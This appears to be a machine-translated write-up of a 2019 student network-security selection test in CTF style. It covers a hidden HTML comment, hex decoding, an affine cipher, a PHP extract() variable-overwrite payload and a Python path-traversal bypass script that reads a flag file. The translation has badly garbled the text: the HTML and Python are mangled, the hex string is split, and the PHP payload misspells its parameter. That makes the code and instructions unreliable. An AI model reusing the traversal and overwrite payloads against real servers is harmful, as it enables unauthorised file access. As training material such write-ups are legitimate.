2019 West experimental class network security selection test

1.FirstBlood

<div the above mentioned id = "MyInfo" 
 class = "the Reveal-Modal" style = "Run the display: none;"> 
<h2> My Information </ h2> <blockquote> 
<the p-> Team Name: Test User </ the p-> 
<the p- > slogan: FirstBl00d </ the p-> 
<- index.php / the User / updatevoice Voice = ->!? 
<the p-> score: 300 </ the p-> 
<the p-> FLAG has been found: 3 </ the p-> 
</ blockquote> 
<a class ="close-reveal-modal"> & # 215; </a> 
</ div>

访问url/index.php/user/updatevoice?voice=FirstBlood

2. hexadecimal string

Open questions, tips:

This is a hexadecimal string, after untie know where the flag 666c61675f69735f686572657b3265346231303234613763386 3353432373139633637613064666333663432302e7068707d

Directly above digital converter thrown hex characters transformed into

 

3. Affine Cipher

Ciphertext: yfsfnhtzlsrftclhwrffonw

In the affine, a = 15, b = 23

The resulting plaintext submit:

Affine password rules is: c = (m * a + b)% 26

To obtain plaintext compared: m = (c - b * a ^ (- 1))% 26

algorithm:

# Coding. 8 = UTF- 
# greatest common divisor 
DEF egcd (A, B): IF A == 0: 
 return (B, 0,. 1 )
  the else : 
G , Y, X = egcd (A% B, A)
  return (G, X - (B // A) * Y, Y) # modulo inverse of 
DEF modinv (A, m):  
G , X, Y = egcd (A, m) 
 IF G =. 1:!  
The raise Exception ( 'Not Modular inverse does exist' ) 
 the else :
 return X% m
  # Euler function 
DEF EULAR (n-): COUNT = 0 
 for

 
 x in xrange(0,n): 
g,x,y = egcd(x,n) 
if g == 1:
 count = count + 1 
return count 
# 仿射密码 
def Affine_cipher(ciphertext,a,b): 
plantext = ''
 # 求逆元
 fa = modinv(a,26) for x in ciphertext: 
if x == ' ': 
plantext += ' '
 continue plantext += chr(ord('a')+((ord(x)-b)-ord('a'))*fa%26) 
return plantext

Call key obtained plaintext

4. Variable cover

<?php
$filename = 'x';
extract($_GET);
if(!empty($attempt))
{
    $conbination = trim(file_get_contents($filename));
    if ($attempt === $conbination)
    {
        echo "<p>neirong" . "$conbination!?</p>";
        require("flag.php");
        echo "<p>congratulation,key is:" . "$flag<p>";
    } else
        {
        echo "<p>Incorrenr!</p>";
        }
}
?>

 

payload：url?attempy=&filename=flag.php

 

5.web.py

def GET(self,filepath):
    if filepath.find("flag")>-1:
        return "Hacker"
    filepath = filepath.replace("../","")
    try:
        with open("./uploads/%s" % filepath,"rb") as f:
            content = f.read()
        return content
    except:
        return web.notfound("Sorry,the file you were looking for was not found.")

 

exp:

from requests import get

def get_flag():
    url = ""
    payload = url + ".../...//.../...//fla../g.txt"
    flag = get(payload).content
    return flag

if __name__ == "__main__":
    flag = get_flag()
    
    print "[x] flag :" +flag